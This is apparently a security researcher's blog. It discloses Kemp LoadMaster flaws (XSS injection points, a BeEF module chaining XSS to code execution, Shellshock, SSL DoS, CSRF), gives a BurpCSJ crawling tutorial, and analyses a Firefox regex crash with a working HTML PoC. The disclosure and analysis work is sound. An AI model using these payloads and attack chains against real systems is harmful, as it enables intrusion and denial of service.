<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJl-67tv5MgspmRg0MXOOvNWISQ-QFpA1DB2nQDCicUefx3oxmBoamqKOevTwMmB2_ccX032ZDb4ulesbQQE-E2N3UkseUBaUJelyLihv0zG33bJSj4U-5rZTNtdpy4Y55otS3gk5w6Y/s1600/stored-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJl-67tv5MgspmRg0MXOOvNWISQ-QFpA1DB2nQDCicUefx3oxmBoamqKOevTwMmB2_ccX032ZDb4ulesbQQE-E2N3UkseUBaUJelyLihv0zG33bJSj4U-5rZTNtdpy4Y55otS3gk5w6Y/s1600/stored-xss.png" /></a></div>
<br />
Further injection points:<br />
<br />
Page: /progs/fwaccess/add/0<br />
Method: POST<br />
Parameter: comment<br />
<br />
Page: /progs/doconfig/setmotd<br />
Method: POST<br />
Parameter:<br />
<br />
<b>BeEF Module</b><br />
<br />
As part of this research, I have developed a BeEF module that takes advantage of chaining these vulnerabilities together. It is always sweet to use an XSS as the starting point for code execution against an appliance.<br />
<br />
The github pull request for the module can be found <a href="https://github.com/beefproject/beef/pull/1104/files">here</a>, and below you can find a video of it in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/aLrZpgxV00s/0.jpg" frameborder="0" height="266" src="http://www.youtube.com/embed/aLrZpgxV00s?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
For this module, I wanted to use the beef.net.forge_request() function with the POST method, which is required to exploit the RCE vectors above. However, the POST method was not usable at the time of writing this module, and <a href="https://twitter.com/antisnatchor">@antisnatchor</a> was very quick to <a href="https://twitter.com/antisnatchor/status/579246846490632192">fix it</a>. So if you want to try it, ensure you have the latest version of BeEF installed.<br />
<br />
<br />
<b>Extra - bonus</b><br />
<br />
<b>Denial of Service</b> - status: unknown - reported on June 2014<br />
<br />
It appears the <a href="https://www.thc.org/thc-ssl-dos/">thc-ssl-dos</a> tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master.<br />
<br />
<b>Shell-shock</b> - status: unknown - reported in 2015<br />
<br />
Obviously, the application is not immune to the infamous <a href="http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29">shell-shock vulnerability</a>. This was found by my friend <a href="http://pheneghan.blogspot.co.uk/">Paul Heneghan</a> and then by a user complaining on the vendor's blog (the comment was removed shortly after).<br />
<br />
For those of you who are more curious, the shell-shock vulnerability works perfectly via the User-Agent header, including in version 7.1-18 and possibly in version 7.1-20 as well.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWR82uYSPvBfdMJAleA9-vMwWMh113R_zzBBXKImNkMZQxFx20bfcLLPY9nowVw3qc0TgjsfuHYQ2VInQK0-2JU8KoAfN9dvlFxa4VJaxGwVIqOZR8oL7g8jyqHSHrWqjLhOPJZpAoA5c/s1600/shell-shock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWR82uYSPvBfdMJAleA9-vMwWMh113R_zzBBXKImNkMZQxFx20bfcLLPY9nowVw3qc0TgjsfuHYQ2VInQK0-2JU8KoAfN9dvlFxa4VJaxGwVIqOZR8oL7g8jyqHSHrWqjLhOPJZpAoA5c/s1600/shell-shock.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg77uxqJOSw4RLe2xN-vxBmYvXybarlyiEN_Mwy5L6iVfvkVppweEGldvP6TqMaPJjpshX-5_IeVqnxEPDkboFiWO9uefpkv5UtJKChxGhQbWzhKJSmI905cvgyOsgYCoNTk_HFEqh7liw/s1600/shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg77uxqJOSw4RLe2xN-vxBmYvXybarlyiEN_Mwy5L6iVfvkVppweEGldvP6TqMaPJjpshX-5_IeVqnxEPDkboFiWO9uefpkv5UtJKChxGhQbWzhKJSmI905cvgyOsgYCoNTk_HFEqh7liw/s1600/shell.png" /></a></div>
<br />
Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim <a href="http://kemptechnologies.com/solutions/waf/">here</a>), if their main product is affected by so many critical vulnerabilities ;-)<br />
<br />
If you are keen for an extra-extra bonus, keep reading...<br />
<br />
<b>Extra - extra bonus:</b><br />
<br />
<b>No license, no web authentication</b><br />
<br />
If you manage to invalidate your license, you will be presented with a page such as the one below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMIx3Tr88H6mDr5ZMxs4j9OevfHuwhb-Ca4ZuJiBs3znFiPkz8iQewUyXAyyLY1v9oqut3moA00dD1qo86blb1JNh5wK44uH0js6o6EYxLRp5mc8HijhfpOyBn5z-sDlzjoP1vAKcOUU/s1600/invalid-license.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMIx3Tr88H6mDr5ZMxs4j9OevfHuwhb-Ca4ZuJiBs3znFiPkz8iQewUyXAyyLY1v9oqut3moA00dD1qo86blb1JNh5wK44uH0js6o6EYxLRp5mc8HijhfpOyBn5z-sDlzjoP1vAKcOUU/s1600/invalid-license.png" height="156" width="400" /></a></div>
<br />
<br />
However, most of the underlying functionality is still available and "attackable" without the need for Basic authentication. You can invalidate the license via CSRF by setting the system time far in the future ;-)<br />
<br />
Hope you enjoyed the post. I am sure there are other vulnerabilities in this product; if you find them, please let me know.<br />
<br />
Roberto Suggi Liverani, http://www.blogger.com/profile/00603006078110455351<br />
<br />
<b>BurpCSJ - Dealing with authentication</b> - published 2014-08-29T10:45:00.000+02:00<br />
<br />
I have received many questions on how to properly handle authentication when using <a href="https://github.com/malerisch/burp-csj">BurpCSJ</a>, so here is a short tutorial on how to manage it. If you are looking for how to use this <a href="http://portswigger.net/burp/">Burp</a> extension, here is a <a href="http://blog.malerisch.net/2013/09/burpcsj-tutorial-using-crawljax.html">basic tutorial</a> as well.<br />
<br />
In this post, we are going to use BurpCSJ against the Altoro bank (a deliberately vulnerable web application), which is available online here: <a href="http://demo.testfire.net/">http://demo.testfire.net/</a><br />
<br />
First, start clean (the reasons will be clear at the end of this tutorial):<br />
<br />
- Start Burp;<br />
- Start browser and configure proxy settings to work with Burp;<br />
- Browse to target site: <a href="http://demo.testfire.net/">http://demo.testfire.net/</a><br />
- Perform login: user: jsmith - password: Demo1234<br />
- Check the Burp cookie jar (under Options / Sessions); it should be populated with some cookies:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQHZEkJQDZfNBYzJz9295zAWNrV5TpJgwqi3K9N5FHlsnFQxoa6VWxc4v5YagtVL8tUpU_X-sH4-n015Vgedlr8b9LTfssDFxxmWVK6czw8jS8N_ISlAOtgYex2SpMr5LZuwVcmDVQqU/s1600/valid-session.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQHZEkJQDZfNBYzJz9295zAWNrV5TpJgwqi3K9N5FHlsnFQxoa6VWxc4v5YagtVL8tUpU_X-sH4-n015Vgedlr8b9LTfssDFxxmWVK6czw8jS8N_ISlAOtgYex2SpMr5LZuwVcmDVQqU/s1600/valid-session.png" height="222" width="320" /></a></div>
<br />
- Configure BurpCSJ (Crawljax tab) and make sure that "Use Manual Proxy" is ticked and points to Burp, and that the "Use cookie jar" option is ticked as well:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtI7fJ4a0P7VlgQY6Qp1V80ATjfPQjVonuZuHra2C4wawjsolo8MQZsyfTmHNEaMM10TbDyQAaChIiuuJOvMriEb9dAvhGo1pUxkuV5u-8tY45nH0drqOkcLuRr6TRkC12IsIS6cWjEJw/s1600/burp-csj-options.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtI7fJ4a0P7VlgQY6Qp1V80ATjfPQjVonuZuHra2C4wawjsolo8MQZsyfTmHNEaMM10TbDyQAaChIiuuJOvMriEb9dAvhGo1pUxkuV5u-8tY45nH0drqOkcLuRr6TRkC12IsIS6cWjEJw/s1600/burp-csj-options.png" /></a></div>
<br />
<br />
- Start/Launch BurpCSJ against the target site (right-click, "Send URL to crawljax" option). When BurpCSJ launches <a href="http://crawljax.com/">Crawljax</a>, you will notice that the first request has no "Cookie" header. This is normal in WebDriver, because <a href="http://docs.seleniumhq.org/docs/03_webdriver.jsp#cookies">WebDriver needs to first initialize</a>, so no worries.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnWIC5HQLbqTONuV8tLTh4HQSLlTaRfQCk4xEatr-iT-vZtiqieXB-BpRZreuGY2Z7qsXu8Cyo02TWYp60mwPYNp8t3nrXC6BuQ8upr-IQ8ae8o6z9hhpdq8uImvCHDdTTKdjl5iNPls/s1600/1st-request-withoutcookie.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnWIC5HQLbqTONuV8tLTh4HQSLlTaRfQCk4xEatr-iT-vZtiqieXB-BpRZreuGY2Z7qsXu8Cyo02TWYp60mwPYNp8t3nrXC6BuQ8upr-IQ8ae8o6z9hhpdq8uImvCHDdTTKdjl5iNPls/s1600/1st-request-withoutcookie.png" /></a></div>
<br />
<br />
- The second request, or the third (depending on whether there is a redirection), and all subsequent requests performed by Crawljax will include the valid cookies from the cookie jar.<br />
<br />
You are now performing an authenticated crawling session and if you check the browser managed by WebDriver, you should notice that it is using a valid authenticated session.<br />
<br />
If you do not follow the first two steps, you might run into issues and fail to get a proper authenticated crawling session. This happened to me quite a few times...<br />
<br />
Let's say that you already started the browser and logged in, and only then enabled the Burp proxy and ran BurpCSJ. The issue is that Burp has no history of the Set-Cookie header, so it will pick up the cookies sent by the browser and populate the cookie jar using the <b>parent domain</b> only as a reference.<br />
<br />
Below, you can see the issue by comparing the cookies in the browser and the ones in the Burp cookie jar. Can you spot the difference? ;-)<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj53tCwDcOnOiR01qAHtHRl9qHVQqLsDCEpYkTTQ2pOZO8QqH0nvNRb46W2GtUyK8-0fO3fMzqNtBSFfxSS3qSp1ZrDQ1SRLffcY3W_7HnLGQZ_W1_ldgLTmf7YVTKhc3QKtbQrHPYPgbs/s1600/burp-cookiejar-mismatch-topublish.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj53tCwDcOnOiR01qAHtHRl9qHVQqLsDCEpYkTTQ2pOZO8QqH0nvNRb46W2GtUyK8-0fO3fMzqNtBSFfxSS3qSp1ZrDQ1SRLffcY3W_7HnLGQZ_W1_ldgLTmf7YVTKhc3QKtbQrHPYPgbs/s1600/burp-cookiejar-mismatch-topublish.png" /></a><br />
<br />
If this happens, a BurpCSJ crawl against demo.testfire.net will not use the cookies in the Burp cookie jar, as demo.testfire.net does not match testfire.net. So no authenticated crawling session in this case...<br />
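To make the cookie scoping behind this concrete, here is an added Python example (not BurpCSJ's or Burp's own code) implementing RFC 6265 domain and path matching and building the Cookie header a compliant client would send. The jar inferred from a browser request alone is modelled as a host-only entry for the parent domain, because no Domain attribute was ever observed; how Burp stores it internally is not covered by this post, and the cookie names and values are constructed.<br />

```python
from dataclasses import dataclass


@dataclass
class Cookie:
    name: str
    value: str
    domain: str        # effective domain the cookie is scoped to
    host_only: bool    # True when no Domain attribute was seen (RFC 6265 host-only flag)
    path: str = "/"


def domain_matches(request_host, cookie_domain):
    """RFC 6265 section 5.1.3: the host equals the domain or is a subdomain of it."""
    request_host = request_host.lower()
    cookie_domain = cookie_domain.lower()
    if request_host == cookie_domain:
        return True
    return request_host.endswith("." + cookie_domain)


def path_matches(request_path, cookie_path):
    """RFC 6265 section 5.1.4 path-match."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def cookie_applies(cookie, request_host, request_path="/"):
    """RFC 6265 section 5.4: host-only cookies require an exact host match,
    domain cookies use domain-match; both must also path-match."""
    if cookie.host_only:
        host_ok = request_host.lower() == cookie.domain.lower()
    else:
        host_ok = domain_matches(request_host, cookie.domain)
    return host_ok and path_matches(request_path, cookie.path)


def cookie_header(jar, request_host, request_path="/"):
    """Return the Cookie header value a compliant client would send, or None if nothing applies."""
    pairs = ["%s=%s" % (c.name, c.value) for c in jar if cookie_applies(c, request_host, request_path)]
    return "; ".join(pairs) if pairs else None


# Constructed jars; the real cookie names are in the screenshots above.
# Jar populated from an observed Set-Cookie on demo.testfire.net (the clean workflow):
JAR_FROM_SET_COOKIE = [Cookie("JSESSIONID", "abc123", "demo.testfire.net", host_only=True)]
# Jar inferred only from a browser request, recorded against the parent domain (the lazy workflow):
JAR_FROM_REQUEST_ONLY = [Cookie("JSESSIONID", "abc123", "testfire.net", host_only=True)]


if __name__ == "__main__":
    for label, jar in (("set-cookie jar", JAR_FROM_SET_COOKIE), ("request-only jar", JAR_FROM_REQUEST_ONLY)):
        print(label, "->", cookie_header(jar, "demo.testfire.net", "/bank/main.jsp"))
```

The second jar yields no Cookie header for demo.testfire.net, which is exactly the unauthenticated crawl described above; a cookie with an explicit Domain=testfire.net attribute would match, which is why starting clean and letting the proxy see the Set-Cookie header matters.<br />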
<br />
So don't be lazy: restart/clean the browser from time to time if you have to... ;-)<br />
<br />
The latest Crawljax package has fixed multiple issues. I have noticed the crawler is more diligent and sticks to the target domain instead of visiting pages from out-of-scope domains.<br />
<br />
As usual, feedback is more than welcome; feel free to contact me or raise GitHub issues: <a href="https://github.com/malerisch/burpcsj">https://github.com/malerisch/burpcsj</a><br />
<br />
Roberto Suggi Liverani, http://www.blogger.com/profile/00603006078110455351<br />
<br />
<b>Crashing Firefox with Regular Expression</b> - published 2013-12-18T09:32:00.000+01:00<br />
<br />
Recently, I found an interesting crash in Firefox and decided to investigate further. I Googled for it and it appears that the issue is already <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=872971">known</a> and was reported a few months ago to Mozilla.<br />
However, the bug is <b>not</b> fixed yet (at least in FF 26), and as a personal exercise I decided to dig a little deeper and collect some notes, which I am sharing in this blog post. <br />
Here is a brief analysis of what I have found, thanks also to the pointers given by my friend <a href="http://www.signal11.eu/en/research/">Andrzej Dereszowski</a>. <br />
<br />
This is the crash PoC:<br />
<br />
<i><span style="font-family: Courier New, Courier, monospace;"><html></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><head></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"><script></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">function main() {</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">regexp = /(?!Z)r{2147483647,}M\d/;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">"A".match(regexp);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">}</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;">main();</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></script></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></head></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><body></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></body></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></html></span></i><br />
<br />
<br />
Below, a windbg screen shot showing the crash on Firefox 25 / Windows 8.1 (64bit):<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsJHOu9C443K2dTXs0hVPqZPjLbkVFauZWO6L2VWPu5Lf9Z1gxnVTAPvOwHSPIB46R3oCOAzKA2ilG_eKSBSLrkGsfK7YZof7Hu-fGvOXRdUaFS_ULxY4Svm9boV6a9VldW2sU7ptsZmc/s1600/initial-crash1.png" imageanchor="1"><img border="0" height="442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsJHOu9C443K2dTXs0hVPqZPjLbkVFauZWO6L2VWPu5Lf9Z1gxnVTAPvOwHSPIB46R3oCOAzKA2ilG_eKSBSLrkGsfK7YZof7Hu-fGvOXRdUaFS_ULxY4Svm9boV6a9VldW2sU7ptsZmc/s640/initial-crash1.png" width="640" /></a><br />
<br />
At this stage, we can infer that an overflow occurred and that, as a protective measure, FF deliberately crashes instead of handling the issue gracefully. In my PoC, you can already see the integer <i>2147483647</i> used as a repetition count in the regular expression.<br />
<br />
In the call stack, there are functions dealing with the RegExp just before mozjs!WTF::CrashOnOverflow::overflowed. Let's put a breakpoint on the previous function, mozjs!JSC::Yarr::YarrGenerator<1>::generatePatternCharacterFixed+0x87, and see what happens just before the overflow is identified.<br />
<br />
This is the function we are setting the breakpoint (bp) in:<br />
<br />
<i><span style="font-family: Courier New, Courier, monospace;">void generatePatternCharacterFixed(size_t opIndex)</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> {</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> YarrOp& op = m_ops[opIndex];</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> PatternTerm* term = op.m_term;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> UChar ch = term->patternCharacter;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"> const RegisterID character = regT0;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> const RegisterID countRegister = regT1;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"> move(index, countRegister);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> sub32(Imm32(term->quantityCount.unsafeGet()), countRegister);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"> Label loop(this);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> BaseIndex address(input, countRegister, m_charScale, (Checked<int>(term->inputPosition - m_checked + Checked<int64_t>(term->quantityCount)) * static_cast<int>(m_charSize == Char8 ? sizeof(char) : sizeof(UChar))).unsafeGet());</span></i><br />
<br />
The bp is set on the BaseIndex address() part. This is where some checks are performed on our integer.<br />
<br />
After stepping through the various checks, our integer (<i>2147483647</i>) ends up in both lhs and rhs, which are then added together. The sum is stored in the "result" variable, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI9OcyXW2h-dcEyMenQmfGAKPAHgFbWQZm-Sio6PqpWVTxBCarHdg5xUz9lMBKi-y26BVh9-7Y0MI8M8fzG30_P7ug0j2Be-f83iI1AVdstlzRGWDtxuJBnQwEbTSw-m4-upi38GSKlU4/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI9OcyXW2h-dcEyMenQmfGAKPAHgFbWQZm-Sio6PqpWVTxBCarHdg5xUz9lMBKi-y26BVh9-7Y0MI8M8fzG30_P7ug0j2Be-f83iI1AVdstlzRGWDtxuJBnQwEbTSw-m4-upi38GSKlU4/s640/s1.png" width="640" /></a></div>
<br />
<br />
The sum of lhs and rhs is <i>4294967294 </i>(0xFFFFFFFE), which fits in the int64 it is stored in. Following that, a further check is performed when the result is narrowed, as shown below:<br />
<br />
<i><span style="font-family: Courier New, Courier, monospace;"> template <typename U> Checked(const Checked<U, OverflowHandler>& rhs)</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> : OverflowHandler(rhs)</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> {</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> if (!isInBounds<T>(rhs.m_value))</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> this->overflowed();</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> m_value = static_cast<T>(rhs.m_value);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> }</span></i><br />
<br />
<div>
Within the isInBounds check (in the screenshot below), the minimum value is 0x80000000 and the maximum value is 0x7FFFFFFF, which means between -2147483648 and 2147483647, the range of a long.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFrigysUjnQmjR-TioAIIX6JVOHmP_hvmPMdVnAPDs4CqfhVjS6wpQD7NDRBpeQ2SxrE-DMnC0PcBMc2z5rqb1Q9upkKhwsTylr_yZEYn4aDUd3PlTzPiJXhdnekUDCUd9srTvz2Vo4ZI/s1600/max-value.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFrigysUjnQmjR-TioAIIX6JVOHmP_hvmPMdVnAPDs4CqfhVjS6wpQD7NDRBpeQ2SxrE-DMnC0PcBMc2z5rqb1Q9upkKhwsTylr_yZEYn4aDUd3PlTzPiJXhdnekUDCUd9srTvz2Vo4ZI/s1600/max-value.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
The rhs.m_value is now <i>4294967294</i> (0xFFFFFFFE) as result of the previous arithmetic operation between lhs and rhs.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihi5KhMDmbkc4ndeYlhTxtNO0qPxSOMweemIO-bpBdeVJek87NFisAA-JoKCbYmA51cNkD-bzE7otzDF-JPQZznSDOCBxXMCZfT58yr40l4vgHMUOkQxgeo7vnPoLHqDl-UB6U-7I9DYI/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihi5KhMDmbkc4ndeYlhTxtNO0qPxSOMweemIO-bpBdeVJek87NFisAA-JoKCbYmA51cNkD-bzE7otzDF-JPQZznSDOCBxXMCZfT58yr40l4vgHMUOkQxgeo7vnPoLHqDl-UB6U-7I9DYI/s640/s3.png" width="640" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
This triggers the check, as 0xFFFFFFFE is greater than 0x7FFFFFFF (the max value in the isInBounds check). This would call overflowed(), which would then simply crash FF.</div>
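A small Python model of the checked arithmetic the trace above steps through, added here and not the browser's code: exact Python integers stand in for the int64 intermediate, and a sticky flag marks the point where isInBounds fails and the real Checked class would call overflowed(). The inputs are the ones from the trace (lhs and rhs both 2147483647); the UChar size of 2 is an assumption standing in for m_charSize.

```python
# Bounds the post reads out of isInBounds<T> for a signed 32-bit T.
INT32_MIN = -0x80000000   # 0x80000000 interpreted as a signed value
INT32_MAX = 0x7FFFFFFF


def is_in_bounds(value, lo=INT32_MIN, hi=INT32_MAX):
    """Mirror of isInBounds<T>: True when value is representable in [lo, hi]."""
    return lo <= value <= hi


class Checked:
    """Integer with a sticky overflow flag, modelled on the Checked<T> class above.

    Arithmetic is exact (Python ints play the role of the wider int64 intermediate);
    the flag is raised as soon as a result does not fit the target range, which is
    where the real class narrows the value and calls overflowed(). The model narrows
    after every operation, the real code narrows on conversion to Checked<int>; for
    the inputs in the trace the outcome is the same.
    """

    def __init__(self, value, lo=INT32_MIN, hi=INT32_MAX, overflowed=False):
        self.lo, self.hi = lo, hi
        self.value = value
        self.overflowed = overflowed or not is_in_bounds(value, lo, hi)

    def _combine(self, other, op):
        if not isinstance(other, Checked):
            other = Checked(other, self.lo, self.hi)
        return Checked(op(self.value, other.value), self.lo, self.hi,
                       self.overflowed or other.overflowed)

    def __add__(self, other):
        return self._combine(other, lambda a, b: a + b)

    def __sub__(self, other):
        return self._combine(other, lambda a, b: a - b)

    def __mul__(self, other):
        return self._combine(other, lambda a, b: a * b)

    def unsafe_get(self):
        """unsafeGet() equivalent: only meaningful if overflowed is False."""
        return self.value


def checked_index(lhs, rhs, char_size=2):
    """Evaluate (lhs + rhs) * char_size as the BaseIndex address() call does.

    lhs stands for term->inputPosition - m_checked, rhs for term->quantityCount,
    char_size for sizeof(UChar) (assumed 2 here). Returns the intermediate sum,
    the scaled offset and whether overflowed() would have been called.
    """
    total = Checked(lhs) + Checked(rhs)
    scaled = total * char_size
    return {
        "sum": total.value,
        "sum_hex": hex(total.value & 0xFFFFFFFFFFFFFFFF),
        "scaled": scaled.value,
        "overflowed": scaled.overflowed,
    }


if __name__ == "__main__":
    # The case from the trace: both operands hold 2147483647.
    print(checked_index(2147483647, 2147483647))
    # A benign offset for comparison.
    print(checked_index(100, 5))
```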
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-34216321887045261972013-09-09T23:29:00.000+02:002014-08-29T16:07:34.728+02:00BurpCSJ extension releaseAs part of my research and talk titled "<a href="http://www.slideshare.net/robertosl81/augmented-reality-in-your-web-proxy">Augmented Reality in your web proxy</a>" presented during the <a href="https://appsec.eu/program/hackpra-allstars/">HackPra AllStars program</a> / <a href="https://appsec.eu/">OWASP AppSec EU 2013</a> security conference in Hamburg, I decided to release a new <a href="http://portswigger.net/burp/editions.html">Burp Pro</a> extension which integrates <a href="http://www.crawljax.com/">Crawljax</a>, <a href="http://docs.seleniumhq.org/">Selenium</a> and <a href="http://junit.org/">JUnit</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
I decided to take this approach to increase application spidering coverage (especially for Ajax web apps), speed up complex test-cases and take advantage of the <a href="http://portswigger.net/burp/extender/">Burp Extender API</a>.</div>
<br />
<b>Downloads</b><br />
<ul>
<li>BurpCSJ extension JAR - <a href="http://bit.ly/burpcsj0-2">download</a> (all dependencies included)</li>
<li>BurpCSJ source code - <a href="https://github.com/malerisch/burp-csj">github</a><br />
</li>
<li>"Augmented Reality in your web proxy" - <a href="http://www.slideshare.net/robertosl81/augmented-reality-in-your-web-proxy">presentation</a> (slideshare)</li>
</ul>
<div>
<b>Getting started</b></div>
<div>
<ol>
<li><a href="http://bit.ly/burpcsj0-2">Download BurpCSJ</a>;</li>
<li>Load BurpCSJ extension jar via the Extender tab;</li>
<li>Choose the URL item from any Burp tab (e.g. target, proxy history, repeater); </li>
<li>Right click on the URL item;</li>
<li>Choose menu item "Send URL to Crawljax";</li>
<li>Crawljax will automatically start crawling the URL that you choose.</li>
</ol>
</div>
<div>
<b>Tutorials</b></div>
<div>
<br /></div>
<div>
- <a href="http://blog.malerisch.net/2013/09/burpcsj-tutorial-using-crawljax.html">BurpCSJ tutorial - Using Crawljax</a></div>
<div>
<br /></div>
<div>
<b>Screenshots</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbf9gvdPEninZUV7-kKNZsNUaZrO0XvadvNFDnKuhoZA4DJZRYIcNGvE8qLXs1bikoOX5HF3LUJiqEl1LCsl5sSZX4nvZRQg5l1bMgEZ_LZwQFhFEv69C_5UP9_NA56-aH1cIInxNHa60/s1600/burp-csj1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbf9gvdPEninZUV7-kKNZsNUaZrO0XvadvNFDnKuhoZA4DJZRYIcNGvE8qLXs1bikoOX5HF3LUJiqEl1LCsl5sSZX4nvZRQg5l1bMgEZ_LZwQFhFEv69C_5UP9_NA56-aH1cIInxNHa60/s200/burp-csj1.png" height="170" width="200" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivkeGJO07s8LelWSRHqYdvfjd6T2_hRdgSFHTHxFXtxsGYS6DHjcVJH6QnnxZsXhj7jeytcf9nDGLZvXiJtUtH-DtNnNWV51Ppscf4MD_I9DGU09tXcNN8wffQ7k309PNmPDA_tZeZmN4/s1600/burp-csj2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivkeGJO07s8LelWSRHqYdvfjd6T2_hRdgSFHTHxFXtxsGYS6DHjcVJH6QnnxZsXhj7jeytcf9nDGLZvXiJtUtH-DtNnNWV51Ppscf4MD_I9DGU09tXcNN8wffQ7k309PNmPDA_tZeZmN4/s320/burp-csj2.png" height="91" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>Videos</b></div>
<div>
<br /></div>
BurpCSJ extension in action:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
